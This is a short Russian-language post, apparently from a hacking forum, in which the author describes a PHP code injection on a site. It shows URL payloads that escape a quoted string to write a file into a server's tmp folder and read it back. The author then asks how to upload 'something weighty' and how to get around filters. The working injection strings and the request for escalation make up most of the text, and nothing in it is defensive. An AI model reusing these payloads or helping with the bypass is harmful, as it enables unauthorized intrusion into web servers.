Есть PHP code injection

там все функции на загрузку или запись выключены

пишется только в папку tmp

/page1';$b=fopen('/var/www/ru/tmp/333.php','w');fwrite($b,%20'111text');$a='

Вызывается

page1';$b=file_get_contents('/var/www/ru/tmp/333.php');echo%20$b;$a='

Как залить что то весомое ? как можно обойти фильтры ?

если записать в файл пхп код то выдает ошибку Parse error: syntax error, unexpected ';'

/page1';$b=fopen('/var/www/ru/tmp/333.php','w');fwrite($b, '');$a='